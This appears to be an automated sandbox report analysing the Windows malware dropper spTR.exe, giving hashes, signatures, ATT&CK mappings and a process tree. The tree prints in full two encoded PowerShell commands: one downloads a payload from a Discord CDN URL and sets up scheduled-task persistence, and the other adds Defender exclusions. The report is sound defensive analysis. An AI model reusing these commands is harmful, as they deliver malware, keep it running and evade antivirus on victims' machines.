6c23cb875ddf2f1a659b422909bce3aefecc1bccb51baf3e35115aea4276ea22

General

Target

spTR.exe
Size

4.4MB
MD5

9ccf9044e1aa57b7461a1a10d7f341e3
SHA1

a613d387882a78f3a28e0a1aab94cfa74106768c
SHA256

6c23cb875ddf2f1a659b422909bce3aefecc1bccb51baf3e35115aea4276ea22
SHA512

59bca4de3e507c200d8999f064ff551ae4ae63812383fcfa216b336d928dc29fb53ebbf3c706d17cbdae65c68ac43abedd42790aa627f5cc4105346bb5689ff1
SSDEEP

49152:FZhHCH5CMHp16zQRhHFMHAF4gXe1FEHqljMuFx+ykcIU6QTNh5ojYXj3:ThiZl2UWjgXekmMuFx+NckBjSj3

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1082158236297351201/1101510061307732048/string93.err

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	2148	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3924	Netplwiz.exe

Loads dropped DLL 1 IoCs

pid	Process
3924	Netplwiz.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3896	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3488	powershell.exe
2148	powershell.exe
2148	powershell.exe
3488	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 1412	4384	spTR.exe	84
PID 4384 wrote to memory of 1412	4384	spTR.exe	84
PID 1412 wrote to memory of 3924	1412	cmd.exe	86
PID 1412 wrote to memory of 3924	1412	cmd.exe	86
PID 3924 wrote to memory of 3488	3924	Netplwiz.exe	88
PID 3924 wrote to memory of 3488	3924	Netplwiz.exe	88
PID 3924 wrote to memory of 2148	3924	Netplwiz.exe	87
PID 3924 wrote to memory of 2148	3924	Netplwiz.exe	87
PID 4384 wrote to memory of 2020	4384	spTR.exe	91
PID 4384 wrote to memory of 2020	4384	spTR.exe	91
PID 2148 wrote to memory of 3896	2148	powershell.exe	100
PID 2148 wrote to memory of 3896	2148	powershell.exe	100
PID 2148 wrote to memory of 3436	2148	powershell.exe	101
PID 2148 wrote to memory of 3436	2148	powershell.exe	101

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spTR.exe
"C:\Users\Admin\AppData\Local\Temp\spTR.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ChangeMyName.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows \System32\Netplwiz.exe
    "C:\Windows \System32\Netplwiz.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -Encoded UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuADMAMgAuAFIAZQBnAGkAcwB0AHIAeQBdADoAOgBDAHUAcgByAGUAbgB0AFUAcwBlAHIALgBPAHAAZQBuAFMAdQBiAEsAZQB5ACgAIgBTAG8AZgB0AHcAYQByAGUAXABDAGgAYQBuAGcAZQBNAHkATgBhAG0AZQAiACkALgBHAGUAdABWAGEAbAB1AGUAKAAkAE4AdQBsAGwAKQApADsAJABEAEQAagA4ADgANwAwADUANQAxADUAOQA1ACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAVQBwAGQAYQB0AGUAQgByAG8AawBlAHIALgBlAHIAcgAiADsAJABEAEQAagA4ADgANwAwADUANQAxADUAOQA2ACAAPQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAVQBwAGQAYQB0AGUAQgByAG8AawBlAHIALgBlAHgAZQAiADsAaQBmACAAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAEQARABqADgAOAA3ADAANQA1ADEANQA5ADYAIAAtAFAAYQB0AGgAVAB5ACAATABlAGEAZgApACkAewAgAHQAcgB5ACAAewAkAEQARABqADgAOAA3ADAANQA1ADEANQA5ADcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAWgBHADQAdQBaAEcAbAB6AFkAMgA5AHkAWgBHAEYAdwBjAEMANQBqAGIAMgAwAHYAWQBYAFIAMABZAFcATgBvAGIAVwBWAHUAZABIAE0AdgBNAFQAQQA0AE0AagBFADEATwBEAEkAegBOAGoASQA1AE4AegBNADEATQBUAEkAdwBNAFMAOAB4AE0AVABBAHgATgBUAEUAdwBNAEQAWQB4AE0AegBBADMATgB6AE0AeQBNAEQAUQA0AEwAMwBOADAAYwBtAGwAdQBaAHoAawB6AEwAbQBWAHkAYwBnAD0APQAnACkAKQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEQARABqADgAOAA3ADAANQA1ADEANQA5ADcAIAAtAE8AdQB0AGYAaQBsAGUAIAAkAEQARABqADgAOAA3ADAANQA1ADEANQA5ADUAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBNAGEAaQBuACgAJABEAEQAagA4ADgANwAwADUANQAxADUAOQA2ACwAJABEAEQAagA4ADgANwAwADUANQAxADUAOQA1ACwAJwBDAG8AbgB2AGUAcgB0AC4AVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAVwB0AHcAdABSAEkAYwBrAGsAYwBqAG8AcQA0AGkAYQB2ADUAcwA5AFIAagBhAHQAWAAxAGIAcABNAEUAegBKAHMARQBRAEQASQBUAHAAYQBBAGoASQBtADgAYQBjAE8AbgB2AFYAagBxADEAQgB3AFQARABXAFoAcAB2AFkAZgBtAFoANgBtAG0AZgBTAGIAUABSADkAcgBhAHcAdQA2AFkATgBDAGEAcgBQAGMAMQBDAGQAcwBFADcAUAB1AE4ASwBsAEEAaQBlAHoAawBIAGQAMwBUAFoAMgBTAFYAZwBTAFoAQgBjAHQANwB4AFcANwBFAGoASgB2AE4AZQA5AGYAdgBoAHkAdgBNAGIAaQBsADQANwB5ADUAQwA5AHMASQBNAHYAaABPAFMAZABOAHgAbQBsAFoAUABiAFUAUABZAFQAMwBGAHUAZwB0AEcANwBiAHoAeQBBADkAYQA0AEYAMQBCAGoAYQA3AHUATgBTAFUAQQBJAGoAQwBUAEsAagBxAFoAbABKADMANwBrACkAJwAsACcANQA5ACcAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQARABEAGoAOAA4ADcAMAA1ADUAMQA1ADkANQB9AGMAYQB0AGMAaAB7AH0AfQBlAGwAcwBlAHsAfQA7AEcAZQB0AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBoAGEAbgBnAGUATQB5AE4AYQBtAGUAIgAgAHwAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEYAbwByAGMAZQA7AHMAYwBoAHQAYQBzAGsAcwAgAC8AQwByAGUAYQB0AGUAIAAvAHIAbAAgAEgASQBHAEgARQBTAFQAIAAvAEYAIAAvAFQATgAgAEUAdgBlAG4AdABMAG8AZwAgAC8AVABSACAAJABEAEQAagA4ADgANwAwADUANQAxADUAOQA2ACAALwBTAEMAIABPAE4ARQBWAEUATgBUACAALwBFAEMAIABTAHkAcwB0AGUAbQAgAC8ATQBPACAAKgBbAFMAeQBzAHQAZQBtAC8ARQB2AGUAbgB0AEkARAA9ADMAMAAxAF0AOwBzAGMAaAB0AGEAcwBrAHMAIAAvAFIAdQBuACAALwBUAE4AIABFAHYAZQBuAHQATABvAGcAOwA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2148
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Create /rl HIGHEST /F /TN EventLog /TR C:\Users\Admin\AppData\Roaming\BraveUpdateBroker.exe /SC ONEVENT /EC System /MO *[System/EventID=301]
        5⤵
        Creates scheduled task(s)
        
        PID:3896
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Run /TN EventLog
        5⤵
        
        PID:3436
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -Encoded QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBVAHAAZABhAHQAZQBCAHIAbwBrAGUAcgAuAGUAeABlACIALAAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAiACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAIgBCAHIAYQB2AGUAVQBwAGQAYQB0AGUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIALgBkAGwAbAAiACwAIgAuAGMAbwBtACIALAAiAC4AYgBhAHQAIgAsACIALgBlAHgAZQAiADsAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgADEAOwA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ChangeMyName_old.bat
  2⤵
  PID:2020

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
30495faa99eba43540fb963f9519623d

SHA1
893991e76b8158d7ea11bbe8119b8d50a4814abb

SHA256
8dbad37c9723dc72ca921b42acbdbb606101f1bc1bce675aee390876229af057

SHA512
39da3aa4cf120dd8911defa564dcb8906487a9574dc6edb55365b609d582477644ac3628f3bb119581b8d53223a7482ac72b0e960cd4ebe4ef173a483ac20a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\ChangeMyName.bat

Filesize
221B

MD5
feff23d91d8f1cd8938a2ac605bd2e86

SHA1
2ee6ee0ef2cec9241b8e4640e132940326f8c5df

SHA256
eac42c915e3fda4686f954065994fc7ad888527e2cdaed45880903bfefdcba9b

SHA512
0ccfb02295fea172be28236628c6427795d298665c1303f5563e198d6f9e4bfb6c8329226fde2ede790ebdc75e4ea4c9053be03cc10e5d5f1bf1cde9244f2756

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nuqnmtqo.wx2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\netutils.dll

Filesize
93KB

MD5
75d9c122e9fdbf7770cf46c8b4547ab5

SHA1
f97bebb3edd276c35774117b9e7b73d1d52d6759

SHA256
5517fadf9096ee76ccd2e32a2eb1861e2b24ffe8ff2467fc53bf8c97107673b7

SHA512
6f99239968c9ad4e160bcafb375bfecebbf8ca83a369b2fa6ac5a30ac48de003146b282ddc0b0e05219e07621e0030eb2e4914b6d2834e97b924a787914c83cc

Download Submit
C:\Windows \System32\Netplwiz.exe

Filesize
40KB

MD5
520a7b7065dcb406d7eca847b81fd4ec

SHA1
d1b3b046a456630f65d482ff856c71dfd2f335c8

SHA256
8323b44b6e69f02356a5ab0d03a4fc87b953edcbd85c2b6281bf92bc0a3b224d

SHA512
7aea2810f38d1640d4aa87efbbe20783fe7b8e7f588864a3a384a37c91108d906abd89b235672608c98c46ed76db2b0039462098a1064ebe4108ec37b6087914

Download Submit
C:\Windows \System32\netutils.dll

Filesize
93KB

MD5
75d9c122e9fdbf7770cf46c8b4547ab5

SHA1
f97bebb3edd276c35774117b9e7b73d1d52d6759

SHA256
5517fadf9096ee76ccd2e32a2eb1861e2b24ffe8ff2467fc53bf8c97107673b7

SHA512
6f99239968c9ad4e160bcafb375bfecebbf8ca83a369b2fa6ac5a30ac48de003146b282ddc0b0e05219e07621e0030eb2e4914b6d2834e97b924a787914c83cc

Download Submit
C:\Windows \System32\netutils.dll

Filesize
93KB

MD5
75d9c122e9fdbf7770cf46c8b4547ab5

SHA1
f97bebb3edd276c35774117b9e7b73d1d52d6759

SHA256
5517fadf9096ee76ccd2e32a2eb1861e2b24ffe8ff2467fc53bf8c97107673b7

SHA512
6f99239968c9ad4e160bcafb375bfecebbf8ca83a369b2fa6ac5a30ac48de003146b282ddc0b0e05219e07621e0030eb2e4914b6d2834e97b924a787914c83cc

Download Submit
memory/2148-173-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-172-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-174-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-179-0x000001816D730000-0x000001816DED6000-memory.dmp

Filesize
7.6MB

Download
memory/2148-180-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-182-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-181-0x000001816C130000-0x000001816C140000-memory.dmp

Filesize
64KB

Download
memory/2148-153-0x000001816C0D0000-0x000001816C0F2000-memory.dmp

Filesize
136KB

Download
memory/3488-171-0x000001E1DC060000-0x000001E1DC070000-memory.dmp

Filesize
64KB

Download
memory/3488-175-0x000001E1DC060000-0x000001E1DC070000-memory.dmp

Filesize
64KB

Download
memory/3488-176-0x000001E1DC060000-0x000001E1DC070000-memory.dmp

Filesize
64KB

Download
memory/3924-147-0x00007FFBD3F40000-0x00007FFBD3F62000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads